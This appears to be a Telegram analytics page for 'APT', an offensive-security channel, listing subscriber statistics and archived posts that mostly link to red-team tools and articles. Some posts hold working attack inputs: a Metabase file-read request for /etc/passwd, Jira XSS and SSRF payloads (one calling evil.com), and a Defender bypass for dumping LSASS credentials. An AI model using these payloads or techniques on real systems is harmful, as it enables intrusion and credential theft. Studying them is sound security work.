en
Feedback
APT

APT

Open in Telegram

This channel discusses: β€” Offensive Security β€” RedTeam β€” Malware Research β€” OSINT β€” etc Disclaimer: t.me/APT_Notes/6 Chat Link: t.me/APT_Notes_PublicChat

Show more

πŸ“ˆ Analytical overview of Telegram channel APT

Channel APT (@apt_notes) in the English language segment is an active participant. Currently, the community unites 14 682 subscribers, ranking 8 834 in the Technologies & Applications category and 45 554 in the Russia region.

πŸ“Š Audience metrics and dynamics

Since its creation on Π½Π΅Π²Ρ–Π΄ΠΎΠΌΠΎ, the project has demonstrated rapid growth, gathering an audience of 14 682 subscribers.

According to the latest data from 13 June, 2026, the channel demonstrates stable activity. Although there has been a change in the number of participants by 414 over the last 30 days and by 17 over the last 24 hours, overall reach remains high.

  • Verification status: Not verified
  • Engagement rate (ER): The average audience engagement rate is 50.76%. Within the first 24 hours after publication, content typically collects N/A% reactions from the total number of subscribers.
  • Post reach: On average, each post receives 7 449 views. Within the first day, a publication typically gains 0 views.
  • Reactions and interaction: The audience actively supports content: the average number of reactions per post is 20.

πŸ“ Description and content policy

The author describes the resource as a platform for expressing subjective opinions:
β€œThis channel discusses: β€” Offensive Security β€” RedTeam β€” Malware Research β€” OSINT β€” etc Disclaimer: t.me/APT_Notes/6 Chat Link: t.me/APT_Notes_PublicChat”

Thanks to the high frequency of updates (latest data received on 14 June, 2026), the channel maintains relevance and a high level of publication reach. Analytics show that the audience actively interacts with content, making it an important point of influence in the Technologies & Applications category.

14 682
Subscribers
+1724 hours
+1027 days
+41430 days
Posts Archive
APT
14 701
CVE-2021-41277 MetaBase Arbitrary File Read PoC: GET /api/geojson?url=file:/etc/passwd HTTP/1.1 #metabase #cve #poc

APT
14 701
Cloudmare Cloudmare is a simple tool to find origin servers of websites protected by Cloudflare, Sucuri or Incapsula with a m
Cloudmare Cloudmare is a simple tool to find origin servers of websites protected by Cloudflare, Sucuri or Incapsula with a misconfiguration DNS. https://github.com/MrH0wl/Cloudmare #bugbounty #cloudflare #tracker #ip

APT
14 701
Windows Privileges https://speakerdeck.com/fr0gger/windows-privileges #windows #privileges #cheatsheet
Windows Privileges https://speakerdeck.com/fr0gger/windows-privileges #windows #privileges #cheatsheet

APT
14 701
GPUSleep Small project of mine that is designed to move Cobalt Strike (or any really) beacon image, and heap, from memory to GPU memory before going to sleep. And moves everything back at the same place after sleep. # https://github.com/oXis/GPUSleep # https://oxis.github.io/GPUSleep/ #redteam #gpu #sleep #beacon

APT
14 701
Atlassian Jira Payloads /secure/QueryComponent!Default.jspa /secure/ViewUserHover.jspa /ViewUserHover.jspa?username=Admin /rest/api/2/dashboard?maxResults=100 /pages/%3CIFRAME%20SRC%3D%22javascript%3Aalert(β€˜XSS’)%22%3E.vm /rest/api/2/user/picker?query=admin /plugins/servlet/oauth/users/icon-uri?consumerUri=https://evil.com /secure/ConfigurePortalPages!default.jspa?view=search&searchOwnerUserName=x2rnu%3Cscript%3Ealert(1)%3C%2fscript%3Et1nmk&Search=SearchConfigurePortalPages.jspa /plugins/servlet/Wallboard/?dashboardId=10100&dashboardId=10101&cyclePeriod=(function(){alert(document.cookie);return%2030000;})()&transitionFx=none&random=true /secure/ConfigurePortalPages!default.jspa?view=popular /secure/ManageFilters.jspa?filterView=search&Search=Search&filterView=search&sortColumn=favcount&sortAscending=false /secure/ContactAdministrators!default.jspa #bugbounty #jira #payloads

APT
14 701
Microsoft Exchange Deserialization RCE (CVE-2021–42321) https://peterjson.medium.com/some-notes-about-microsoft-exchange-deserialization-rce-cve-2021-42321-110d04e8852 #exchange #rce #cve #deserialization

APT
14 701
When You sysWhisper Loud Enough for AV to Hear You https://captmeelo.com/redteam/maldev/2021/11/18/av-evasion-syswhisper.html #av #evasion #syswhisper

APT
14 701
Default Passwords Before performing password attacks, it is worth trying a couple of default passwords against the targeted service. Here are some website that provide default passwords for various products. # https://cirt.net/passwords # https://default-password.info/ # https://datarecovery.com/rd/default-passwords/ #default #passwords #services

APT
14 701
Oh365 User Finder Oh365UserFinder is used for identifying valid o365 accounts without the risk of account lockouts. The tool
Oh365 User Finder Oh365UserFinder is used for identifying valid o365 accounts without the risk of account lockouts. The tool parses responses to identify the "IfExistsResult" flag is null or not, and responds appropriately if the user is valid. https://github.com/dievus/Oh365UserFinder #office365 #user #enumeration

APT
14 701
OffensiveRust β€” Rust Weaponization for Red Team Engagements. Examples in this repo:
β€’ Allocate_With_Syscalls β€” It uses NTDLL functions directly with the ntapi Library
β€’ Create_DLL β€” Creates DLL and pops up a msgbox, Rust does not fully support this so things might get weird since Rust DLL do not have a main function
β€’ DeviceIoControl β€” Opens driver handle and executing DeviceIoControl
β€’ EnableDebugPrivileges β€” Enable SeDebugPrivilege in the current process
β€’ Shellcode_Local_inject β€” Executes shellcode directly in local process by casting pointer
β€’ Execute_With_CMD β€” Executes cmd by passing a command via Rust
β€’ ImportedFunctionCall β€” It imports minidump from dbghelp and executes it
β€’ Kernel_Driver_Exploit β€” Kernel Driver exploit for a simple buffer overflow
β€’ Named_Pipe_Client β€” Named Pipe Client
β€’ Named_Pipe_Server β€” Named Pipe Server
β€’ Process_Injection_CreateThread β€” Process Injection in remote process with CreateRemoteThread
β€’ Unhooking β€” Unhooking calls
β€’ asm_syscall β€” Obtaining PEB address via asm
β€’ base64_system_enum β€” Base64 encoding/decoding strings
β€’ http-https-requests β€” HTTP/S requests by ignoring cert check for GET/POST
β€’ patch_etw β€” Patch ETW
β€’ ppid_spoof β€” Spoof parent process for created process
β€’ tcp_ssl_client β€” TCP client with SSL that ignores cert check (Requires openssl and perl to be installed for compiling)
β€’ tcp_ssl_server β€” TCP Server, with port parameter(Requires openssl and perl to be installed for compiling)
β€’ wmi_execute β€” Executes WMI query to obtain the AV/EDRs in the host
β€’ Windows.h+ Bindings β€” This file contains structures of Windows.h plus complete customized LDR,PEB,etc.. that are undocumented officially by Microsoft, add at the top of your file include!("../bindings.rs");
β€’ UUID_Shellcode_Execution β€” Plants shellcode from UUID array into heap space and uses EnumSystemLocalesA Callback in order to execute the shellcode.

https://github.com/trickster0/OffensiveRust #rust #redteam #malware

APT
14 701
KerbMon Continuous kerberoast monitor https://github.com/Retrospected/kerbmon #kerberos #monitor #pentest

APT
14 701
DLL Hollowing Deep dive into a stealthier DLL hollowing/memory allocation variant. https://www.secforce.com/blog/dll-hollowing-a-deep-dive-into-a-stealthier-memory-allocation-variant/ #malware #dll #hollowing

APT
14 701
InlineWhispers2 Tool for working with Direct System Calls in Cobalt Strike's Beacon Object Files (BOF) via Syswhispers2 https://github.com/Sh0ckFR/InlineWhispers2 #cobaltstrike #BOF #syswhispers

APT
14 701
Bypass Defender and dump LSASS via procdump.exe If you rename procdump.exe to dump64.exe and place it in the "C:\Program File
Bypass Defender and dump LSASS via procdump.exe If you rename procdump.exe to dump64.exe and place it in the "C:\Program Files (x86)\Microsoft Visual Studio\*" folder, you can bypass Defender and dump LSASS. #lsass #dump #defender #bypass #dump64

APT
14 701
The Pentester's Guide https://0xffsec.com/handbook/ #bugbounty #handbook #pentest
The Pentester's Guide https://0xffsec.com/handbook/ #bugbounty #handbook #pentest

APT
14 701
Git Cheat Sheet #git #cheatsheet
Git Cheat Sheet #git #cheatsheet

APT
14 701
Living Off Trusted Sites (LOTS) Attackers are using popular legitimate domains when conducting phishing, C&C, exfiltration an
Living Off Trusted Sites (LOTS) Attackers are using popular legitimate domains when conducting phishing, C&C, exfiltration and downloading tools to evade detection. https://lots-project.com #lots #redteam #blueteam #sites

APT
14 701
Sed Cheat Sheet Useful sed scripts & patterns. https://github.com/adrianscheff/useful-sed #sed #cheatsheet #bash